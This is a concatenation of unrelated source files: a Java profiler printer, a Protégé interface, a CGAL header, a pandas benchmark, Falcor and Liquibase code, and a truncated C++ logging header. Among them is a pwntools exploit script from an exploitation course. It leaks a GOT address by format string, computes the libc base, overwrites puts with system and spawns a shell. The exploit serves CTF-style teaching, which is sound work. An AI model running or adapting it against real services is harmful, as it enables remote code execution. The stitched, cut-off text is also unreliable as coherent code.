edu.uci.python.nodes.call.*; import edu.uci.python.nodes.call.CallDispatchBoxedNode.LinkedDispatchBoxedNode; import edu.uci.python.nodes.call.CallDispatchUnboxedNode.LinkedDispatchUnboxedNode; import edu.uci.python.nodes.call.PythonCallNode.BoxedCallNode; import edu.uci.python.nodes.call.PythonCallNode.CallConstructorNode; import edu.uci.python.nodes.call.PythonCallNode.UnboxedCallNode; import edu.uci.python.nodes.control.*; import edu.uci.python.nodes.control.LoopNode; import edu.uci.python.nodes.function.*; import edu.uci.python.runtime.*; /** * @author Gulfem */ public class ProfilerResultPrinter { private PrintStream out = System.out; private PythonProfilerNodeProber profilerProber; private List<PNode> nodesEmptySourceSections = new ArrayList<>(); private List<PNode> nodesUsingExistingProbes = new ArrayList<>(); private final PythonParseResult parseResult; public ProfilerResultPrinter(PythonProfilerNodeProber profilerProber, PythonParseResult parseResult) { this.profilerProber = profilerProber; this.parseResult = parseResult; } private static long excludedTime = 0; private static long totalCounter = 0; private static long cumulativeTime = 0; public void printCallProfilerResults() { List<MethodBodyInstrument> methodBodyInstruments = profilerProber.getMethodBodyInstruments(); Map<MethodBodyInstrument, List<Long>> timeMap = new HashMap<>(); if (methodBodyInstruments.size() > 0) { printBanner("Call Time Profiling Results", 116); /** * 50 is the length of the text by default padding left padding is added, so space is * added to the beginning of the string, minus sign adds padding to the right */ out.format("%-40s", "Function Name"); out.format("%-20s", "Counter"); out.format("%-20s", "Excluded Time"); out.format("%-20s", "Avg Excluded"); out.format("%-20s", "Cumulative Time"); out.format("%-20s", "Avg Cumulative"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.println(); out.println("=============== =============== =============== =============== =============== =============== ==== ======"); excludedTime = 0; for (MethodBodyInstrument methodBodyInstrument : methodBodyInstruments) { Node methodBody = methodBodyInstrument.getNode(); totalCounter = 0; cumulativeTime = 0; getCumulativeCounterTime(methodBodyInstrument); if (totalCounter > 0) { if (methodBody instanceof ReturnTargetNode) { getExcludedTime(methodBody, methodBodyInstrument); } else { excludedTime = cumulativeTime; } List<Long> times = new ArrayList<>(); times.add(totalCounter); times.add(excludedTime); times.add(cumulativeTime); timeMap.put(methodBodyInstrument, times); } } printTime(timeMap); } } private void getCumulativeCounterTime(MethodBodyInstrument methodBodyInstrument) { ModuleNode moduleNode = (ModuleNode) parseResult.getModuleRoot(); Node moduleBody = moduleNode.getBody(); traverseBody(moduleBody, methodBodyInstrument); for (RootNode functionRoot : parseResult.getFunctionRoots()) { if (functionRoot instanceof FunctionRootNode) { Node methodBody = ((FunctionRootNode) functionRoot).getBody(); traverseBody(methodBody, methodBodyInstrument); } } } private static void traverseBody(Node methodBody, MethodBodyInstrument methodBodyInstrument) { methodBody.accept(new NodeVisitor() { public boolean visit(Node node) { if (node instanceof BoxedCallNode || node instanceof CallConstructorNode || node instanceof UnboxedCallNode) { CallDispatchNode callDispatchNode = null; if (node instanceof BoxedCallNode) { callDispatchNode = ((BoxedCallNode) node).getDispatchNode(); } else if (node instanceof CallConstructorNode) { callDispatchNode = ((CallConstructorNode) node).getDispatchNode(); } else if (node instanceof UnboxedCallNode) { callDispatchNode = ((UnboxedCallNode) node).getDispatchNode(); } if (node.getParent() instanceof PythonWrapperNode) { PythonWrapperNode callWrapper = (PythonWrapperNode) node.getParent(); Node callProbe = (Node) callWrapper.getProbe(); TimeProfilerInstrument subCallInstrument = (TimeProfilerInstrument) callProbe.getChildren().iterator().next(); DirectCallNode callNode = null; if (callDispatchNode instanceof LinkedDispatchBoxedNode) { LinkedDispatchBoxedNode linkDispatchNode = (LinkedDispatchBoxedNode) callDispatchNode; callNode = linkDispatchNode.getInvokeNode().getDirectCallNode(); } else if (callDispatchNode instanceof LinkedDispatchUnboxedNode) { LinkedDispatchUnboxedNode linkUnboxedDispatchNode = (LinkedDispatchUnboxedNode) callDispatchNode; callNode = linkUnboxedDispatchNode.getInvokeNode().getDirectCallNode(); } if (callNode != null) { RootCallTarget callTarget = (RootCallTarget) callNode.getCallTarget(); PythonWrapperNode wrapper = null; if (callTarget.getRootNode() instanceof FunctionRootNode) { FunctionRootNode childRootNode = (FunctionRootNode) callTarget.getRootNode(); wrapper = (PythonWrapperNode) childRootNode.getBody(); } else if (callTarget.getRootNode() instanceof BuiltinFunctionRootNode) { BuiltinFunctionRootNode childRootNode = (BuiltinFunctionRootNode) callTarget.getRootNode(); if (childRootNode.getBody() instanceof PythonWrapperNode) { wrapper = (PythonWrapperNode) childRootNode.getBody(); } } if (wrapper != null) { Node probe = (Node) wrapper.getProbe(); MethodBodyInstrument currentMethodBodyInstrument = (MethodBodyInstrument) probe.getChildren().iterator().next(); if (currentMethodBodyInstrument.equals(methodBodyInstrument)) { totalCounter = totalCounter + subCallInstrument.getCounter(); cumulativeTime = cumulativeTime + subCallInstrument.getTime(); } } } } } return true; } }); } public void getExcludedTime(Node methodBody, MethodBodyInstrument methodBodyInstrument) { excludedTime = cumulativeTime; methodBody.accept(new NodeVisitor() { public boolean visit(Node node) { if (node instanceof BoxedCallNode) { PythonWrapperNode callWrapper = (PythonWrapperNode) node.getParent(); if (!(callWrapper.getParent() instanceof ArgumentsNode)) { Node callProbe = (Node) callWrapper.getProbe(); TimeProfilerInstrument subCallInstrument = (TimeProfilerInstrument) callProbe.getChildren().iterator().next(); BoxedCallNode boxedCallNode = (BoxedCallNode) node; CallDispatchNode callDispatchNode = boxedCallNode.getDispatchNode(); if (callDispatchNode instanceof LinkedDispatchBoxedNode) { LinkedDispatchBoxedNode linkDispatchNode = (LinkedDispatchBoxedNode) callDispatchNode; DirectCallNode callNode = linkDispatchNode.getInvokeNode().getDirectCallNode(); RootCallTarget callTarget = (RootCallTarget) callNode.getCallTarget(); PythonWrapperNode wrapper = null; if (callTarget.getRootNode() instanceof FunctionRootNode) { FunctionRootNode childRootNode = (FunctionRootNode) callTarget.getRootNode(); wrapper = (PythonWrapperNode) childRootNode.getBody(); } else if (callTarget.getRootNode() instanceof BuiltinFunctionRootNode) { BuiltinFunctionRootNode childRootNode = (BuiltinFunctionRootNode) callTarget.getRootNode(); if (childRootNode.getBody() instanceof PythonWrapperNode) { wrapper = (PythonWrapperNode) childRootNode.getBody(); } } if (wrapper != null) { Node probe = (Node) wrapper.getProbe(); MethodBodyInstrument currentMethodBodyInstrument = (MethodBodyInstrument) probe.getChildren().iterator().next(); /** * Do not exclude recursive calls */ if (!methodBodyInstrument.equals(currentMethodBodyInstrument)) { excludedTime = excludedTime - subCallInstrument.getTime(); } } } } } return true; } }); } private void printTime(Map<MethodBodyInstrument, List<Long>> timesMap) { Map<MethodBodyInstrument, List<Long>> sortedTimesMap; if (PythonOptions.SortProfilerResults) { sortedTimesMap = sortTimeProfilerResults(timesMap); } else { sortedTimesMap = timesMap; } long totalCalls = 0; for (Map.Entry<MethodBodyInstrument, List<Long>> entry : sortedTimesMap.entrySet()) { MethodBodyInstrument methodBodyInstrument = entry.getKey(); Node methodBody = methodBodyInstrument.getNode(); String methodName = null; if (methodBody instanceof ReturnTargetNode) { methodName = ((FunctionRootNode) methodBody.getRootNode()).getFunctionName(); } else if (methodBody instanceof PythonBuiltinNode) { methodName = ((BuiltinFunctionRootNode) methodBody.getRootNode()).getFunctionName(); } List<Long> times = entry.getValue(); long counter = times.get(0); long excluded = times.get(1); long cumulative = times.get(2); out.format("%-40s", methodName); out.format("%15s", counter); totalCalls = totalCalls + counter; out.format("%20s", (excluded / 1000000000)); out.format("%20s", ((excluded / counter) / 1000000000)); out.format("%20s", (cumulative / 1000000000)); out.format("%20s", ((cumulative / counter) / 1000000000)); if (methodBody instanceof ReturnTargetNode) { out.format("%9s", methodBody.getSourceSection().getStartLine()); out.format("%11s", methodBody.getSourceSection().getStartColumn()); } else { out.format("%9s", "-"); out.format("%11s", "-"); } out.println(); } out.println("Total number of executed calls: " + totalCalls); } public void printControlFlowProfilerResults() { long totalCount = 0; totalCount += printLoopProfilerResults(); totalCount += printIfProfilerResults(); totalCount += printBreakContinueProfilerResults(); out.println("Total number of executed control flow instruments: " + totalCount); } private long printLoopProfilerResults() { long totalCount = 0; List<ProfilerInstrument> loopInstruments = getInstruments(profilerProber.getLoopInstruments()); if (loopInstruments.size() > 0) { printCaption("Loop Profiling Results"); for (ProfilerInstrument instrument : loopInstruments) { if (instrument.getCounter() > 0) { Node node = instrument.getNode(); Node loopNode = node.getParent().getParent(); if (loopNode instanceof LoopNode) { /** * During generator optimizations for node is replaced with * PeeledGeneratorLoopNode. Since the for loop is replaced, it's better not * to print the result of this specific for profiling. * */ printProfilerResult(loopNode, instrument.getCounter()); totalCount = totalCount + instrument.getCounter(); } } } out.println("Total number of executed instruments: " + totalCount); } return totalCount; } private long printIfProfilerResults() { long totalCount = 0; Map<ProfilerInstrument, List<ProfilerInstrument>> ifInstruments; if (PythonOptions.SortProfilerResults) { ifInstruments = sortIfProfilerResults(profilerProber.getIfInstruments()); } else { ifInstruments = profilerProber.getIfInstruments(); } if (ifInstruments.size() > 0) { printBanner("If Node Profiling Results", 116); out.format("%-20s", "If Counter"); out.format("%-18s", "Then Counter"); out.format("%-18s", "Else Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("=========== ============ ============= ==== ====== ========================================"); Iterator<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>> it = ifInstruments.entrySet().iterator(); while (it.hasNext()) { Entry<ProfilerInstrument, List<ProfilerInstrument>> entry = it.next(); ProfilerInstrument ifInstrument = entry.getKey(); if (ifInstrument.getCounter() > 0) { List<ProfilerInstrument> instruments = entry.getValue(); ProfilerInstrument thenInstrument = instruments.get(0); out.format("%11s", ifInstrument.getCounter()); out.format("%21s", thenInstrument.getCounter()); totalCount = totalCount + ifInstrument.getCounter(); totalCount = totalCount + thenInstrument.getCounter(); if (instruments.size() == 1) { out.format("%19s", "-"); } else if (instruments.size() == 2) { ProfilerInstrument elseInstrument = instruments.get(1); out.format("%19s", elseInstrument.getCounter()); totalCount = totalCount + elseInstrument.getCounter(); } Node ifNode = ifInstrument.getNode(); out.format("%9s", ifNode.getSourceSection().getStartLine()); out.format("%11s", ifNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", ifNode.getRootNode()); out.println(); } } out.println("Total number of executed instruments: " + totalCount); } return totalCount; } private long printBreakContinueProfilerResults() { return printProfilerResults("Break Continue Profiling Results", getInstruments(profilerProber.getBreakContinueInstruments())); } public void printVariableAccessProfilerResults() { if (PythonOptions.ProfileTypeDistribution) { printProfilerTypeDistributionResults("Variable Access Profiling Results", profilerProber.getVariableAccessTypeDistributionInstruments()); } else { printProfilerResults("Variable Access Profiling Results", getInstruments(profilerProber.getVariableAccessInstruments())); } } public void printOperationProfilerResults() { if (PythonOptions.ProfileTypeDistribution) { printProfilerTypeDistributionResults("Operation Profiling Results", profilerProber.getOperationTypeDistributionInstruments()); } else { printProfilerResults("Operation Profiling Results", getInstruments(profilerProber.getOperationInstruments())); } } public void printCollectionOperationsProfilerResults() { printProfilerResults("Collection Operations Profiling Results", getInstruments(profilerProber.getCollectionOperationsInstruments())); } private static List<ProfilerInstrument> getInstruments(List<ProfilerInstrument> instruments) { if (PythonOptions.SortProfilerResults) { List<ProfilerInstrument> sortedInstruments = sortProfilerResult(instruments); return sortedInstruments; } return instruments; } private long printProfilerResults(String caption, List<ProfilerInstrument> instruments) { long totalCount = 0; if (instruments.size() > 0) { printCaption(caption); for (ProfilerInstrument instrument : instruments) { if (instrument.getCounter() > 0) { Node node = instrument.getNode(); printProfilerResult(node, instrument.getCounter()); totalCount = totalCount + instrument.getCounter(); } } out.println("Total number of executed instruments: " + totalCount); } return totalCount; } private void printProfilerTypeDistributionResults(String caption, List<TypeDistributionProfilerInstrument> instruments) { long totalCount = 0; if (instruments.size() > 0) { printBanner(caption, 140); out.format("%-50s", "Node"); out.format("%-20s", "Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("============= =============== ==== ====== =================================================="); for (TypeDistributionProfilerInstrument profilerInstrument : instruments) { Map<Class<? extends Node>, Counter> types = profilerInstrument.getTypes(); if (types.isEmpty()) { Node initialNode = profilerInstrument.getInitialNode(); Node onlyNode = profilerInstrument.getOnlyNode(); long counter = profilerInstrument.getOnlyCounter(); Class<? extends Node> nodeClass = onlyNode.getClass(); totalCount = totalCount + counter; out.format("%-50s", nodeClass.getSimpleName()); out.format("%15s", counter); out.format("%9s", initialNode.getSourceSection().getStartLine()); out.format("%11s", initialNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", initialNode.getRootNode()); out.println(); } else { Iterator<Map.Entry<Class<? extends Node>, Counter>> it = types.entrySet().iterator(); out.println(); while (it.hasNext()) { Entry<Class<? extends Node>, Counter> entry = it.next(); Node initialNode = profilerInstrument.getInitialNode(); Class<? extends Node> nodeClass = entry.getKey(); long counter = entry.getValue().getCounter(); totalCount = totalCount + counter; out.format("%-50s", nodeClass.getSimpleName()); out.format("%15s", counter); out.format("%9s", initialNode.getSourceSection().getStartLine()); out.format("%11s", initialNode.getSourceSection().getStartColumn()); out.format("%5s", ""); out.format("%-70s", initialNode.getRootNode()); out.println(); } out.println(); } } out.println("Total number of executed instruments: " + totalCount); } } private void printCaption(String caption) { printBanner(caption, 116); out.format("%-25s", "Node"); out.format("%-20s", "Counter"); out.format("%-9s", "Line"); out.format("%-11s", "Column"); out.format("%-70s", "In Method"); out.println(); out.println("============= =============== ==== ====== ==================================================="); } private void printProfilerResult(Node node, long counter) { String nodeName = getShortName(node); out.format("%-25s", nodeName); out.format("%15s", counter); out.format("%9s", node.getSourceSection().getStartLine()); out.format("%11s", node.getSourceSection().getStartColumn()); out.format("%11s", node.getSourceSection().getCharLength()); out.format("%5s", ""); out.format("%-70s", node.getRootNode()); out.println(); } private static String getShortName(Node node) { NodeInfo nodeInfo = node.getClass().getAnnotation(NodeInfo.class); if (nodeInfo == null) { nodeInfo = node.getClass().getSuperclass().getAnnotation(NodeInfo.class); } else if (nodeInfo.shortName().equals("")) { nodeInfo = node.getClass().getSuperclass().getAnnotation(NodeInfo.class); } if (nodeInfo != null) { return nodeInfo.shortName(); } else { throw new RuntimeException("Short name is missing in " + node); } } private static List<ProfilerInstrument> sortProfilerResult(List<ProfilerInstrument> list) { Collections.sort(list, new Comparator<ProfilerInstrument>() { @Override public int compare(final ProfilerInstrument profiler1, final ProfilerInstrument profiler2) { return Long.compare(profiler2.getCounter(), profiler1.getCounter()); } }); return list; } private static Map<ProfilerInstrument, List<ProfilerInstrument>> sortIfProfilerResults(Map<ProfilerInstrument, List<ProfilerInstrument>> map) { List<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>> list = new LinkedList<>(map.entrySet()); Collections.sort(list, new Comparator<Map.Entry<ProfilerInstrument, List<ProfilerInstrument>>>() { public int compare(Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> if1, Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> if2) { return Long.compare(if2.getKey().getCounter(), if1.getKey().getCounter()); } }); Map<ProfilerInstrument, List<ProfilerInstrument>> result = new LinkedHashMap<>(); for (Map.Entry<ProfilerInstrument, List<ProfilerInstrument>> entry : list) { result.put(entry.getKey(), entry.getValue()); } return result; } private static Map<MethodBodyInstrument, List<Long>> sortTimeProfilerResults(Map<MethodBodyInstrument, List<Long>> map) { List<Map.Entry<MethodBodyInstrument, List<Long>>> list = new LinkedList<>(map.entrySet()); Collections.sort(list, new Comparator<Map.Entry<MethodBodyInstrument, List<Long>>>() { public int compare(Map.Entry<MethodBodyInstrument, List<Long>> if1, Map.Entry<MethodBodyInstrument, List<Long>> if2) { return Long.compare(if2.getValue().get(0).longValue(), if1.getValue().get(0).longValue()); } }); Map<MethodBodyInstrument, List<Long>> result = new LinkedHashMap<>(); for (Map.Entry<MethodBodyInstrument, List<Long>> entry : list) { result.put(entry.getKey(), entry.getValue()); } return result; } public void addNodeEmptySourceSection(PNode node) { nodesEmptySourceSections.add(node); } public void addNodeUsingExistingProbe(PNode node) { nodesUsingExistingProbes.add(node); } public void printNodesEmptySourceSections() { if (nodesEmptySourceSections.size() > 0) { printBanner("Nodes That Have Empty Source Sections", 10); for (PNode node : nodesEmptySourceSections) { out.println(node.getClass().getSimpleName() + " in " + node.getRootNode()); } } } public void printNodesUsingExistingProbes() { if (nodesUsingExistingProbes.size() > 0) { printBanner("Nodes That Reuses an Existing Probe", 10); for (PNode node : nodesUsingExistingProbes) { out.println(node.getClass().getSimpleName() + " in " + node.getRootNode()); } } } private void printBanner(String caption, int size) { // CheckStyle: stop system..print check int bannerSize = size - caption.length() - 2; for (int i = 0; i < bannerSize / 2; i++) { out.print("="); } out.print(" " + caption + " "); for (int i = 0; i < (bannerSize - (bannerSize / 2)); i++) { out.print("="); } out.println(); // CheckStyle: resume system..print check } }
12,771
907
<reponame>h4ck3rb0b/linux-exploitation-course from pwn import * #context.log_level = "debug" printf_got = 0x804b00c puts_got = 0x0804b01c system_libc_offset = 0x40310 printf_libc_offset = 0x4d410 def main(): # p = process("./diapers") p = remote("localhost", 1343) p.recv(0x60) # Read the menu log.info("Selecting overflowable brand") p.sendline("3") # Send 3 p.recv(0x3d) # Read the options log.info("Decrementing volume...") # Trigger the overflow condition for i in range(257): p.sendline("1") p.recv(0x200) log.info("Overflowable") ### Leak the GOT addresses ### # Write to format string member p.sendline("0") # Payload payload = "A"*15 + p32(printf_got) + "::%18$s::" payload = payload.ljust(108, ".") p.send(payload) p.recvrepeat(0.4) # Trigger the leak to get the dynamic address of strlen p.sendline("2") leak = p.recvrepeat(0.4) delim_index = leak.index("::") + 2 printf_address = u32(leak[delim_index:delim_index+4]) log.info("Got leak to printf: 0x%x" % printf_address) # Calculate libc base libc_base = printf_address - printf_libc_offset log.info("libc Base: 0x%x" % libc_base) # Calculate system address system_address = libc_base + system_libc_offset log.info("System Address: 0x%x" % system_address) ### Perform the Exploitation Overwrite ### # Write to format string member p.sendline("0") # Payload fmt = fmtstr_payload(18, {puts_got: system_address}) payload = "A"*11 + "\x00"*4 + fmt payload = payload.ljust(108, "\x00") p.send(payload) p.recv(0x500) # Trigger the overwrite and get shell p.sendline("2") p.sendline("!sh") # Cause of the ed p.recvrepeat(0.4) log.success("Enjoy your shell") p.interactive() if __name__ == "__main__": main()
808
746
<gh_stars>100-1000 package org.protege.editor.owl.model.selection.ontologies; import org.semanticweb.owlapi.model.OWLOntology; import java.util.Set; /** * Author: drummond<br> * http://www.cs.man.ac.uk/~drummond/<br><br> * The University Of Manchester<br> * Bio Health Informatics Group<br> * Date: Jun 6, 2008<br><br> */ public interface OntologySelectionStrategy { Set<OWLOntology> getOntologies(); String getName(); }
162
2,392
// Copyright (C) 2014-2018 GeometryFactory Sarl // // This file is part of CGAL (www.cgal.org) // // $URL: https://github.com/CGAL/cgal/blob/v5.1/Installation/include/CGAL/Surface_mesh/Surface_mesh_fwd.h $ // $Id: Surface_mesh_fwd.h 8bb22d5 2020-03-26T14:23:37+01:00 <NAME> // SPDX-License-Identifier: LGPL-3.0-or-later OR LicenseRef-Commercial // #ifndef CGAL_SURFACE_MESH_FWD_H #define CGAL_SURFACE_MESH_FWD_H /// \file Surface_mesh_fwd.h /// Forward declarations of the Surface_mesh package. #ifndef DOXYGEN_RUNNING namespace CGAL { // fwdS for the public interface template<typename P> class Surface_mesh; } // CGAL #endif #endif /* CGAL_SURFACE_MESH_FWD_H */
286
331
<filename>benchmarks/Pandas/run.py #!/usr/bin/env python from __future__ import division, print_function import pandas as pd import time test_file = "test_01.csv" def run_timed(name, func, numRepeats=3): runtimes = [] for i in xrange(numRepeats): print("\n *** Running {} [Iteration: {}]".format(name, i+1)) t1 = time.time() func() t2 = time.time() runtimes.append(t2 - t1) runtimes = pd.Series(runtimes) return "{:<40s} min: {:6.3f} mean: {:6.3f} max: {:6.3f}".format( name, runtimes.min(), runtimes.mean(), runtimes.max() ) def test_count_python(): count = 0 for _ in open(test_file).readlines(): count += 1 print(count) def test_count_pandas(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) print(len(df)) def test_column_averages(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) meanA = df.A.mean() meanB = df.B.mean() meanC = df.C.mean() meanD = df.D.mean() print(meanA, meanB, meanC, meanD) def test_unique_values1(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) count = df.C.nunique() print(count) def test_unique_values2(): df = pd.read_csv(test_file, header=None, names=["A", "B", "C", "D"]) count = len(df[["C", "D"]].drop_duplicates()) print(count) def test_join(): df_a = pd.read_csv("test_02_a.csv", header=None, names=["K1", "K2", "K3", "valA"]) df_b = pd.read_csv("test_02_b.csv", header=None, names=["K1", "K2", "K3", "valB"]) joined = df_a.merge(df_b, on=["K1", "K2", "K3"]) mean_diff = (joined["valA"] - joined["valB"]).mean() print(mean_diff) result_strings = [ run_timed( "Count (no parsing, pure Python)", test_count_python ), run_timed( "Count (Pandas)", test_count_pandas ), run_timed( "Column averages", test_column_averages ), run_timed( "Unique values 1", test_unique_values1 ), run_timed( "Unique values 2", test_unique_values2 ), run_timed( "Join", test_join ), ] print("\n *** Summary:") print("\n".join(result_strings))
1,111
2,542
// ------------------------------------------------------------ // Copyright (c) Microsoft Corporation. All rights reserved. // Licensed under the MIT License (MIT). See License.txt in the repo root for license information. // ------------------------------------------------------------ #pragma once namespace Reliability { namespace ReconfigurationAgentComponent { namespace Infrastructure { // Represents a time based throttle class IThrottle { public: // Return the number of elements that would cause the throttle to be hit virtual int GetCount(Common::StopwatchTime now) = 0; // Tell the throttle that 'count' elements happened at a particular time virtual void Update(int count, Common::StopwatchTime now) = 0; virtual ~IThrottle() {} }; } } }
354
1,615
<reponame>NVIDIAGameWorks/Falcor /*************************************************************************** # Copyright (c) 2015-21, NVIDIA CORPORATION. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions # are met: # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of NVIDIA CORPORATION nor the names of its # contributors may be used to endorse or promote products derived # from this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS "AS IS" AND ANY # EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY # OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. **************************************************************************/ #include "stdafx.h" #include "PythonImporter.h" #include <filesystem> #include <regex> namespace Falcor { namespace { /** Parse the legacy header on the first line of the script with the syntax: # filename.extension */ static std::optional<std::string> parseLegacyHeader(const std::string& script) { if (size_t endOfFirstLine = script.find_first_of("\n\r"); endOfFirstLine != std::string::npos) { const std::regex headerRegex(R"""(#\s+([\w-]+\.[\w]{1,10}))"""); std::smatch match; if (std::regex_match(script.begin(), script.begin() + endOfFirstLine, match, headerRegex)) { if (match.size() > 1) return match[1].str(); } } return {}; } static std::set<std::string> sImportPaths; ///< Set of currently imported paths, used to avoid recursion. static std::vector<std::string> sImportDirectories; ///< Stack of import directories to properly handle adding/removing data search paths. /** This class is used to handle nested imports through RAII. It keeps a set of import paths in sImportPaths to detect recursive imports. It keeps a stack of import directories in sImportdirectories and updates the global data search directories. */ class ScopedImport { public: ScopedImport(const std::string& path) : mPath(path) , mDirectory(getDirectoryFromFile(path)) { sImportPaths.emplace(mPath); sImportDirectories.push_back(mDirectory); // Add directory to search directories (add it to the front to make it highest priority). addDataDirectory(mDirectory, true); } ~ScopedImport() { auto erased = sImportPaths.erase(mPath); assert(erased == 1); assert(sImportDirectories.size() > 0); sImportDirectories.pop_back(); // Remove script directory from search path (only if not needed by the outer importer). if (std::find(sImportDirectories.begin(), sImportDirectories.end(), mDirectory) == sImportDirectories.end()) { removeDataDirectory(mDirectory); } } private: std::string mPath; std::string mDirectory; }; static bool isRecursiveImport(const std::string& path) { return sImportPaths.find(path) != sImportPaths.end(); } } void PythonImporter::import(const std::string& filename, SceneBuilder& builder, const SceneBuilder::InstanceMatrices& instances, const Dictionary& dict) { if (!instances.empty()) { throw ImporterError(filename, "Python importer does not support instancing."); } std::string fullpath; if (!findFileInDataDirectories(filename, fullpath)) { throw ImporterError(filename, "File not found."); } if (isRecursiveImport(filename)) { throw ImporterError(filename, "Scene is imported recursively."); } // Load the script file const std::string script = readFile(fullpath); // Check for legacy .pyscene file format. if (auto sceneFile = parseLegacyHeader(script)) { throw ImporterError(filename, "Python scene file is using old header comment syntax. Use the new 'sceneBuilder' object instead."); } // Keep track of this import and add script directory to data search directories. // We use RAII here to make sure the scope is properly removed when throwing an exception. ScopedImport scopedImport(fullpath); // Execute script. try { Scripting::Context context; context.setObject("sceneBuilder", &builder); Scripting::runScript("from falcor import *", context); Scripting::runScriptFromFile(fullpath, context); } catch (const std::exception& e) { throw ImporterError(filename, fmt::format("Failed to run python scene script: {}", e.what())); } } FALCOR_REGISTER_IMPORTER( PythonImporter, Importer::ExtensionList({ "pyscene" }) ) }
2,426
2,591
package liquibase.ui; import liquibase.ExtensibleObject; import liquibase.exception.LiquibaseException; import liquibase.plugin.Plugin; import java.io.PrintWriter; /** * Service for interacting with the user. */ public interface UIService extends ExtensibleObject, Plugin { int getPriority(); /** * Send a "normal" message to the user. */ void sendMessage(String message); /** * Send an "error" message to the user. */ void sendErrorMessage(String message); /** * Send an "error" message to the user along with a stacktrace. */ void sendErrorMessage(String message, Throwable exception); /** * Prompt the user with the message and wait for a response.<br> * If this UIService implementation does not support user prompts, return the default value.<br> * If inputHandler is null, {@link DefaultInputHandler} will be used.<br> * If inputHandler throws an {@link IllegalArgumentException}, the user will be given the chance to re-enter the value.<br> * If the inputHandler returns true for {@link InputHandler#shouldAllowEmptyInput()} and the user enters an empty value * when prompted, or hits "enter", the valueIfNoEntry will be returned. If the inputHandler returns false for * {@link InputHandler#shouldAllowEmptyInput()}, the user will be reprompted until they enter a non-empty value, * which will then be returned. */ <T> T prompt(String prompt, T valueIfNoEntry, InputHandler<T> inputHandler, Class<T> type); /** * * Method to set flag indicating whether prompting is allowed * * @param allowPrompt New flag value * @throws IllegalArgumentException If parameter is not allowed * */ void setAllowPrompt(boolean allowPrompt) throws IllegalArgumentException; /** * * Return current setting of allow prompt flag * * @return boolean * */ boolean getAllowPrompt(); }
659
443
<reponame>Rahul18728/cerl /* ------------------------------------------------------------------------- // WINX: a C++ template GUI library - MOST SIMPLE BUT EFFECTIVE // // This file is a part of the WINX Library. // The use and distribution terms for this software are covered by the // Common Public License 1.0 (http://opensource.org/licenses/cpl.php) // which can be found in the file CPL.txt at this distribution. By using // this software in any fashion, you are agreeing to be bound by the terms // of this license. You must not remove this notice, or any other, from // this software. // // Module: stdext/scopedbg/ScopeLog.h // Creator: xushiwei // Email: <EMAIL> // Contributor: <EMAIL> // Date: 2007-2-2 20:31:46 // // $Id: $ // -----------------------------------------------------------------------*/ #ifndef STDEXT_SCOPEDBG_SCOPELOG_H #define STDEXT_SCOPEDBG_SCOPELOG_H #ifndef STDEXT_STORAGE_H #include "../Storage.h" #endif #ifndef STDEXT_LOG_H #include "../Log.h" #endif #ifndef STD_DEQUE_H #include "../../std/deque.h" #endif #if !defined(WINX_USE_WINSDK) #if !defined(STD_NO_WINSDK) #ifndef _INC_SHLWAPI #include <shlwapi.h> #endif #else #ifndef STDEXT_WINAPI_SHLWAPI_H #include "../winapi/shlwapi.h" #endif #endif #endif NS_STDEXT_BEGIN // ========================================================================= // printScopeMessage template <class StorageT, class CharT> inline void winx_call printScopeMessage( StorageT& stg, const CharT* msg, const CharT* msgEnd, char rep_ch, UINT rep_count) { for (;;) { if (msg == msgEnd) return; const CharT* it = std::find(msg, msgEnd, '\n'); const CharT* it2 = (it == msgEnd ? msgEnd : it+1); stg.put(rep_count, rep_ch); stg.put(msg, it2 - msg); if (it == msgEnd) { stg.put('\n'); return; } msg = it2; } } // ========================================================================= // class ScopeStorage template <class StorageT> class ScopeStorage : public StorageT { private: typedef typename StorageT::char_type CharT; typedef std::basic_string<CharT> StringT; typedef StringStorage<StringT> StringStorageT; typedef std::deque<StringT> QueuedMessageT; QueuedMessageT m_scopes; StringStorageT m_curr; public: typedef CharT char_type; struct _LogTo { StorageT& m_stg; UINT m_level; _LogTo(StorageT& stg) : m_stg(stg), m_level(0) { } void winx_call operator()(StringT& str) { if (str.size()) { const CharT* msg = &*str.begin(); printScopeMessage(m_stg, msg, msg + str.size(), ' ', m_level<<2); str.erase(); } ++m_level; } }; public: ScopeStorage() {} template <class ArgT> ScopeStorage(ArgT arg) : StorageT(arg) {} template <class ArgT1, class ArgT2> ScopeStorage(ArgT1 arg1, ArgT2 arg2) : StorageT(arg1, arg2) {} ~ScopeStorage() { commit(); } public: void winx_call enterScope() { m_scopes.push_back(m_curr); m_curr.erase(); } void winx_call leaveScope() { 